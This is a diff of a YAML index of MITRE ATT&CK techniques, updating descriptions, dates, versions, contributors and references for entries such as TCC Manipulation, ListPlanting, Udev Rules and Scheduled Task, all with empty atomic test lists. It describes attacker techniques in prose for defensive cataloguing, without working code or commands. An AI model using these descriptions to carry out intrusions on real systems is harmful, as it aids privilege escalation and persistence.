-      modified: '2024-04-17T00:02:12.021Z'
+      modified: '2024-10-16T16:54:56.714Z'
       name: TCC Manipulation
-      description: "Adversaries can manipulate or abuse the Transparency, Consent,
-        & Control (TCC) service or database to execute malicious applications with
-        elevated permissions. TCC is a Privacy & Security macOS control mechanism
-        used to determine if the running process has permission to access the data
-        or services protected by TCC, such as screen sharing, camera, microphone,
-        or Full Disk Access (FDA).\n\nWhen an application requests to access data
-        or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database,
-        located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent),
-        for existing permissions. If permissions do not exist, then the user is prompted
-        to grant permission. Once permissions are granted, the database stores the
-        application's permissions and will not prompt the user again unless reset.
-        For example, when a web browser requests permissions to the user's webcam,
-        once granted the web browser may not explicitly prompt the user again.(Citation:
-        welivesecurity TCC)\n\nAdversaries may manipulate the TCC database or otherwise
-        abuse the TCC service to execute malicious content. This can be done in various
-        ways, including using privileged system applications to execute malicious
-        payloads or manipulating the database to grant their application TCC permissions.
-        \n\nFor example, adversaries can use Finder, which has FDA permissions by
-        default, to execute malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002)
-        while preventing a user prompt. For a system without System Integrity Protection
-        (SIP) enabled, adversaries have also manipulated the operating system to load
-        an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation:
-        TCC macOS bypass)(Citation: TCC Database)\n\nAdversaries may also opt to instead
-        inject code (e.g., [Process Injection](https://attack.mitre.org/techniques/T1055))
-        into targeted applications with the desired TCC permissions.\n"
+      description: |+
+        Adversaries can manipulate or abuse the Transparency, Consent, & Control (TCC) service or database to grant malicious executables elevated permissions. TCC is a Privacy & Security macOS control mechanism used to determine if the running process has permission to access the data or services protected by TCC, such as screen sharing, camera, microphone, or Full Disk Access (FDA).
+
+        When an application requests to access data or a service protected by TCC, the TCC daemon (`tccd`) checks the TCC database, located at `/Library/Application Support/com.apple.TCC/TCC.db` (and `~/` equivalent), and an overwrites file (if connected to an MDM) for existing permissions. If permissions do not exist, then the user is prompted to grant permission. Once permissions are granted, the database stores the application's permissions and will not prompt the user again unless reset. For example, when a web browser requests permissions to the user's webcam, once granted the web browser may not explicitly prompt the user again.(Citation: welivesecurity TCC)
+
+        Adversaries may access restricted data or services protected by TCC through abusing applications previously granted permissions through [Process Injection](https://attack.mitre.org/techniques/T1055) or executing a malicious binary using another application. For example, adversaries can use Finder, a macOS native app with FDA permissions, to execute a malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002). When executing under the Finder App, the malicious [AppleScript](https://attack.mitre.org/techniques/T1059/002) inherits access to all files on the system without requiring a user prompt. When System Integrity Protection (SIP) is disabled, TCC protections are also disabled. For a system without SIP enabled, adversaries can manipulate the TCC database to add permissions to their malicious executable through loading an adversary controlled TCC database using environment variables and [Launchctl](https://attack.mitre.org/techniques/T1569/001).(Citation: TCC macOS bypass)(Citation: TCC Database)
+
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
@@ -23007,6 +23269,8 @@ privilege-escalation:
         phase_name: privilege-escalation
       x_mitre_contributors:
       - Marina Liang
+      - Wojciech Reguła @_r3ggi
+      - Csaba Fitzl @theevilbit of Kandji
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -23014,7 +23278,7 @@ privilege-escalation:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - macOS
-      x_mitre_version: '1.0'
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'File: File Modification'
@@ -23044,7 +23308,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1055.008:
     technique:
@@ -23090,7 +23353,7 @@ privilege-escalation:
         description: stderr. (2014, February 14). Detecting Userland Preload Rootkits.
           Retrieved December 20, 2017.
         source_name: Chokepoint preload rootkits
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:26:31.766Z'
       name: Ptrace System Calls
       description: "Adversaries may inject malicious code into processes via ptrace
         (process trace) system calls in order to evade process-based defenses as well
@@ -23135,8 +23398,6 @@ privilege-escalation:
       x_mitre_defense_bypassed:
       - Anti-virus
       - Application control
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1037.001:
     technique:
@@ -23162,7 +23423,7 @@ privilege-escalation:
         url: http://www.hexacorn.com/blog/2014/11/14/beyond-good-ol-run-key-part-18/
         description: Hexacorn. (2014, November 14). Beyond good ol’ Run key, Part
           18. Retrieved November 15, 2019.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-03-24T23:45:03.153Z'
       name: 'Boot or Logon Initialization Scripts: Logon Script (Windows)'
       description: "Adversaries may use Windows logon scripts automatically executed
         at logon initialization to establish persistence. Windows allows logon scripts
@@ -23188,59 +23449,28 @@ privilege-escalation:
       - 'Command: Command Execution'
       - 'Process: Process Creation'
       - 'Windows Registry: Windows Registry Key Creation'
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1037.001
     atomic_tests: []
   T1055.015:
     technique:
-      x_mitre_platforms:
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
-      type: attack-pattern
-      created: '2021-11-22T15:02:15.190Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1055.015
-        url: https://attack.mitre.org/techniques/T1055/015
-      - source_name: Microsoft List View Controls
-        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
-        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
-          January 4, 2022.
-      - source_name: Modexp Windows Process Injection
-        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
-        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
-          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
-          Retrieved November 15, 2021.'
-      - source_name: ESET InvisiMole June 2020
-        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
-        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
-          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-08-14T17:34:33.948Z'
       name: 'Process Injection: ListPlanting'
       description: "Adversaries may abuse list-view controls to inject malicious code
         into hijacked processes in order to evade process-based defenses as well as
         possibly elevate privileges. ListPlanting is a method of executing arbitrary
-        code in the address space of a separate live process. Code executed via ListPlanting
-        may also evade detection from security products since the execution is masked
-        under a legitimate process.\n\nList-view controls are user interface windows
-        used to display collections of items.(Citation: Microsoft List View Controls)
-        Information about an application's list-view settings are stored within the
-        process' memory in a <code>SysListView32</code> control.\n\nListPlanting (a
-        form of message-passing \"shatter attack\") may be performed by copying code
-        into the virtual address space of a process that uses a list-view control
-        then using that code as a custom callback for sorting the listed items.(Citation:
-        Modexp Windows Process Injection) Adversaries must first copy code into the
-        target process’ memory space, which can be performed various ways including
-        by directly obtaining a handle to the <code>SysListView32</code> child of
-        the victim process window (via Windows API calls such as <code>FindWindow</code>
+        code in the address space of a separate live process.(Citation: Hexacorn Listplanting)
+        Code executed via ListPlanting may also evade detection from security products
+        since the execution is masked under a legitimate process.\n\nList-view controls
+        are user interface windows used to display collections of items.(Citation:
+        Microsoft List View Controls) Information about an application's list-view
+        settings are stored within the process' memory in a <code>SysListView32</code>
+        control.\n\nListPlanting (a form of message-passing \"shatter attack\") may
+        be performed by copying code into the virtual address space of a process that
+        uses a list-view control then using that code as a custom callback for sorting
+        the listed items.(Citation: Modexp Windows Process Injection) Adversaries
+        must first copy code into the target process’ memory space, which can be performed
+        various ways including by directly obtaining a handle to the <code>SysListView32</code>
+        child of the victim process window (via Windows API calls such as <code>FindWindow</code>
         and/or <code>EnumWindows</code>) or other [Process Injection](https://attack.mitre.org/techniques/T1055)
         methods.\n\nSome variations of ListPlanting may allocate memory in the target
         process but then use window messages to copy the payload, to avoid the use
@@ -23257,6 +23487,9 @@ privilege-escalation:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_contributors:
+      - ESET
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitoring Windows API calls indicative of the various types
         of code injection may generate a significant amount of data and may not be
         directly useful for defense unless collected under specific circumstances
@@ -23271,21 +23504,52 @@ privilege-escalation:
         arguments.\n\nAnalyze process behavior to determine if a process is performing
         unusual actions, such as opening network connections, reading files, or other
         suspicious actions that could relate to post-compromise behavior. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Process: Process Modification'
       - 'Process: OS API Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99
+      created: '2021-11-22T15:02:15.190Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1055/015
+        external_id: T1055.015
+      - source_name: Hexacorn Listplanting
+        description: Hexacorn. (2019, April 25). Listplanting – yet another code injection
+          trick. Retrieved August 14, 2024.
+        url: https://www.hexacorn.com/blog/2019/04/25/listplanting-yet-another-code-injection-trick/
+      - source_name: ESET InvisiMole June 2020
+        description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
+          HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
+        url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
+      - source_name: Microsoft List View Controls
+        description: Microsoft. (2021, May 25). About List-View Controls. Retrieved
+          January 4, 2022.
+        url: https://docs.microsoft.com/windows/win32/controls/list-view-controls-overview
+      - source_name: Modexp Windows Process Injection
+        description: 'odzhan. (2019, April 25). Windows Process Injection: WordWarping,
+          Hyphentension, AutoCourgette, Streamception, Oleum, ListPlanting, Treepoline.
+          Retrieved November 15, 2021.'
+        url: https://modexp.wordpress.com/2019/04/25/seven-window-injection-methods/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1055.015
     atomic_tests: []
   T1484:
     technique:
-      modified: '2024-04-19T04:27:31.884Z'
+      modified: '2024-10-15T15:55:32.946Z'
       name: Domain or Tenant Policy Modification
       description: "Adversaries may modify the configuration settings of a domain
         or identity tenant to evade defenses and/or escalate privileges in centrally
@@ -23330,9 +23594,8 @@ privilege-escalation:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Azure AD
-      - SaaS
-      x_mitre_version: '3.0'
+      - Identity Provider
+      x_mitre_version: '3.1'
       x_mitre_data_sources:
       - 'Active Directory: Active Directory Object Deletion'
       - 'Active Directory: Active Directory Object Creation'
@@ -23389,8 +23652,8 @@ privilege-escalation:
         url: https://wald0.com/?p=179
       - source_name: Harmj0y Abusing GPO Permissions
         description: Schroeder, W. (2016, March 17). Abusing GPO Permissions. Retrieved
-          March 5, 2019.
-        url: http://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/
+          September 23, 2024.
+        url: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/
       - source_name: Sygnia Golden SAML
         description: Sygnia. (2020, December). Detection and Hunting of Golden SAML
           Attack. Retrieved January 6, 2021.
@@ -23399,7 +23662,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1547.008:
     technique:
@@ -23441,7 +23703,7 @@ privilege-escalation:
         Adversaries may modify or add LSASS drivers to obtain persistence on compromised systems. The Windows security subsystem is a set of components that manage and enforce the security policy for a computer or domain. The Local Security Authority (LSA) is the main component responsible for local security policy and user authentication. The LSA includes multiple dynamic link libraries (DLLs) associated with various other security functions, all of which run in the context of the LSA Subsystem Service (LSASS) lsass.exe process.(Citation: Microsoft Security Subsystem)
 
         Adversaries may target LSASS drivers to obtain persistence. By either replacing or adding illegitimate drivers (e.g., [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574)), an adversary can use LSA operations to continuously execute malicious payloads.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T16:34:43.405Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Boot or Logon Autostart Execution: LSASS Driver'
       x_mitre_detection: "With LSA Protection enabled, monitor the event logs (Events
@@ -23466,12 +23728,11 @@ privilege-escalation:
       - Administrator
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1547.008
     atomic_tests: []
   T1078.004:
     technique:
-      modified: '2024-03-29T15:42:13.499Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: 'Valid Accounts: Cloud Accounts'
       description: "Valid accounts in cloud environments may allow adversaries to
         perform actions to achieve Initial Access, Persistence, Privilege Escalation,
@@ -23511,8 +23772,10 @@ privilege-escalation:
         phase_name: privilege-escalation
       - kill_chain_name: mitre-attack
         phase_name: initial-access
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_contributors:
       - Jon Sternstein, Stern Security
+      - Arun Seelagan, CISA
       x_mitre_deprecated: false
       x_mitre_detection: Monitor the activity of cloud accounts to detect abnormal
         or malicious behavior, such as accessing information outside of the normal
@@ -23520,13 +23783,13 @@ privilege-escalation:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
-      - Azure AD
-      - Office 365
       - SaaS
       - IaaS
-      - Google Workspace
-      x_mitre_version: '1.7'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.8'
       x_mitre_data_sources:
       - 'User Account: User Account Authentication'
       - 'Logon Session: Logon Session Metadata'
@@ -23557,17 +23820,14 @@ privilege-escalation:
         url: https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.004
     atomic_tests: []
   T1053.002:
     technique:
-      modified: '2023-11-15T14:38:10.876Z'
+      modified: '2024-10-12T15:53:12.333Z'
       name: 'Scheduled Task/Job: At'
       description: |-
-        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
+        Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
 
         On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the <code>at.allow</code> file. If the <code>at.allow</code> file does not exist, the <code>at.deny</code> file is checked. Every username not listed in <code>at.deny</code> is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the <code>at.deny</code> exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
 
@@ -23630,7 +23890,7 @@ privilege-escalation:
       - Windows
       - Linux
       - macOS
-      x_mitre_version: '2.2'
+      x_mitre_version: '2.3'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       - 'Scheduled Job: Scheduled Job Creation'
@@ -23664,8 +23924,8 @@ privilege-escalation:
         url: https://man7.org/linux/man-pages/man1/at.1p.html
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Microsoft Scheduled Task Events Win10
         description: Microsoft. (2017, May 28). Audit Other Object Access Events.
           Retrieved June 27, 2019.
@@ -23674,6 +23934,10 @@ privilege-escalation:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Malicious Life by Cybereason
+        description: Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding
+          the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.
+        url: https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -23686,7 +23950,6 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.002
     atomic_tests: []
   T1055.001:
@@ -23789,9 +24052,67 @@ privilege-escalation:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1055.001
     atomic_tests: []
+  T1546.017:
+    technique:
+      modified: '2024-11-11T19:05:38.708Z'
+      name: Udev Rules
+      description: |-
+        Adversaries may maintain persistence through executing malicious content triggered using udev rules. Udev is the Linux kernel device manager that dynamically manages device nodes, handles access to pseudo-device files in the `/dev` directory, and responds to hardware events, such as when external devices like hard drives or keyboards are plugged in or removed. Udev uses rule files with `match keys` to specify the conditions a hardware event must meet and `action keys` to define the actions that should follow. Root permissions are required to create, modify, or delete rule files located in `/etc/udev/rules.d/`, `/run/udev/rules.d/`, `/usr/lib/udev/rules.d/`, `/usr/local/lib/udev/rules.d/`, and `/lib/udev/rules.d/`. Rule priority is determined by both directory and by the digit prefix in the rule filename.(Citation: Ignacio Udev research 2024)(Citation: Elastic Linux Persistence 2024)
+
+        Adversaries may abuse the udev subsystem by adding or modifying rules in udev rule files to execute malicious content. For example, an adversary may configure a rule to execute their binary each time the pseudo-device file, such as `/dev/random`, is accessed by an application. Although udev is limited to running short tasks and is restricted by systemd-udevd's sandbox (blocking network and filesystem access), attackers may use scripting commands under the action key `RUN+=` to detach and run the malicious content’s process in the background to bypass these controls.(Citation: Reichert aon sedexp 2024)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: persistence
+      - kill_chain_name: mitre-attack
+        phase_name: privilege-escalation
+      x_mitre_contributors:
+      - Eduardo González Hernández (@codexlynx)
+      - Eder Pérez Ignacio, @ch4ik0
+      - Wirapong Petshagun
+      - "@grahamhelton3"
+      - Ruben Groenewoud, Elastic
+      x_mitre_deprecated: false
+      x_mitre_detection: 'Monitor file creation and modification of Udev rule files
+        in `/etc/udev/rules.d/`, `/lib/udev/rules.d/`, and /usr/lib/udev/rules.d/,
+        specifically the `RUN` action key commands.(Citation: Ignacio Udev research
+        2024) '
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: Process Creation'
+      - 'File: File Modification'
+      type: attack-pattern
+      id: attack-pattern--f4c3f644-ab33-433d-8648-75cc03a95792
+      created: '2024-09-26T17:02:09.888Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1546/017
+        external_id: T1546.017
+      - source_name: Ignacio Udev research 2024
+        description: Eder P. Ignacio. (2024, February 21). Leveraging Linux udev for
+          persistence. Retrieved September 26, 2024.
+        url: https://ch4ik0.github.io/en/posts/leveraging-Linux-udev-for-persistence/
+      - source_name: Elastic Linux Persistence 2024
+        description: Ruben Groenewoud. (2024, August 29). Linux Detection Engineering
+          -  A Sequel on Persistence Mechanisms. Retrieved October 16, 2024.
+        url: https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms
+      - source_name: Reichert aon sedexp 2024
+        description: 'Zachary Reichert. (2024, August 19). Unveiling "sedexp": A Stealthy
+          Linux Malware Exploiting udev Rules. Retrieved September 26, 2024.'
+        url: https://www.aon.com/en/insights/cyber-labs/unveiling-sedexp
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1546.007:
     technique:
       x_mitre_platforms:
@@ -23827,7 +24148,7 @@ privilege-escalation:
         Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.(Citation: TechNet Netsh) The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at <code>HKLM\SOFTWARE\Microsoft\Netsh</code>.
 
         Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.(Citation: Github Netsh Helper CS Beacon)(Citation: Demaske Netsh Persistence)
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-04-20T17:09:17.363Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Event Triggered Execution: Netsh Helper DLL'
       x_mitre_detection: 'It is likely unusual for netsh.exe to have any child processes
@@ -23851,12 +24172,11 @@ privilege-escalation:
       - SYSTEM
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1546.007
     atomic_tests: []
   T1574.004:
     technique:
-      modified: '2023-10-31T14:00:00.188Z'
+      modified: '2023-03-30T21:01:39.601Z'
       name: Dylib Hijacking
       description: |-
         Adversaries may execute their own payloads by placing a malicious dynamic library (dylib) with an expected name in a path a victim application searches at runtime. The dynamic loader will try to find the dylibs based on the sequential order of the search paths. Paths to dylibs may be prefixed with <code>@rpath</code>, which allows developers to use relative paths to specify an array of search paths used at runtime based on the location of the executable.  Additionally, if weak linking is used, such as the <code>LC_LOAD_WEAK_DYLIB</code> function, an application will still execute even if an expected dylib is not present. Weak linking enables developers to run an application on multiple macOS versions as new APIs are added.
@@ -23940,11 +24260,10 @@ privilege-escalation:
         url: https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/persistence/osx/CreateHijacker.py
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
     atomic_tests: []
   T1078.003:
     technique:
-      modified: '2023-07-14T13:04:04.591Z'
+      modified: '2024-10-15T16:36:36.681Z'
       name: 'Valid Accounts: Local Accounts'
       description: "Adversaries may obtain and abuse credentials of a local account
         as a means of gaining Initial Access, Persistence, Privilege Escalation, or
@@ -23996,9 +24315,8 @@ privilege-escalation:
         external_id: T1078.003
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1078.003
     atomic_tests: []
   T1574.012:
@@ -24047,7 +24365,7 @@ privilege-escalation:
         url: https://web.archive.org/web/20170720041203/http://subt0x10.blogspot.com/2017/05/subvert-clr-process-listing-with-net.html
         description: Smith, C. (2017, May 18). Subvert CLR Process Listing With .NET
           Profilers. Retrieved June 24, 2020.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-08-30T21:35:12.049Z'
       name: 'Hijack Execution Flow: COR_PROFILER'
       description: |-
         Adversaries may leverage the COR_PROFILER environment variable to hijack the execution flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature which allows developers to specify an unmanaged (or external of .NET) profiling DLL to be loaded into each .NET process that loads the Common Language Runtime (CLR). These profilers are designed to monitor, troubleshoot, and debug managed code executed by the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER Feb 2013)
@@ -24085,30 +24403,29 @@ privilege-escalation:
       x_mitre_permissions_required:
       - User
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1574.012
     atomic_tests: []
 execution:
   T1053.005:
     technique:
-      modified: '2023-11-15T14:33:53.354Z'
+      modified: '2024-10-13T16:13:47.770Z'
       name: 'Scheduled Task/Job: Scheduled Task'
       description: "Adversaries may abuse the Windows Task Scheduler to perform task
         scheduling for initial or recurring execution of malicious code. There are
         multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111)
         utility can be run directly on the command line, or the Task Scheduler can
         be opened through the GUI within the Administrator Tools section of the Control
-        Panel. In some cases, adversaries have used a .NET wrapper for the Windows
-        Task Scheduler, and alternatively, adversaries have used the Windows netapi32
-        library to create a scheduled task.\n\nThe deprecated [at](https://attack.mitre.org/software/S0110)
-        utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)),
-        though <code>at.exe</code> can not access tasks created with <code>schtasks</code>
-        or the Control Panel.\n\nAn adversary may use Windows Task Scheduler to execute
-        programs at system startup or on a scheduled basis for persistence. The Windows
-        Task Scheduler can also be abused to conduct remote Execution as part of Lateral
-        Movement and/or to run a process under the context of a specified account
-        (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
+        Panel.(Citation: Stack Overflow) In some cases, adversaries have used a .NET
+        wrapper for the Windows Task Scheduler, and alternatively, adversaries have
+        used the Windows netapi32 library and [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047)
+        (WMI) to create a scheduled task. Adversaries may also utilize the Powershell
+        Cmdlet `Invoke-CimMethod`, which leverages WMI class `PS_ScheduledTask` to
+        create a scheduled task via an XML path.(Citation: Red Canary - Atomic Red
+        Team)\n\nAn adversary may use Windows Task Scheduler to execute programs at
+        system startup or on a scheduled basis for persistence. The Windows Task Scheduler
+        can also be abused to conduct remote Execution as part of Lateral Movement
+        and/or to run a process under the context of a specified account (such as
+        SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218),
         adversaries have also abused the Windows Task Scheduler to potentially mask
         one-time execution under signed/trusted system processes.(Citation: ProofPoint
         Serpent)\n\nAdversaries may also create \"hidden\" scheduled tasks (i.e. [Hide
@@ -24155,7 +24472,7 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - Windows
-      x_mitre_version: '1.5'
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'Windows Registry: Windows Registry Key Creation'
       - 'File: File Modification'
@@ -24187,8 +24504,8 @@ execution:
         url: https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments
       - source_name: Twitter Leoloobeek Scheduled Task
         description: Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved
-          December 12, 2017.
-        url: https://twitter.com/leoloobeek/status/939248813465853953
+          September 12, 2024.
+        url: https://x.com/leoloobeek/status/939248813465853953
       - source_name: Tarrask scheduled task
         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
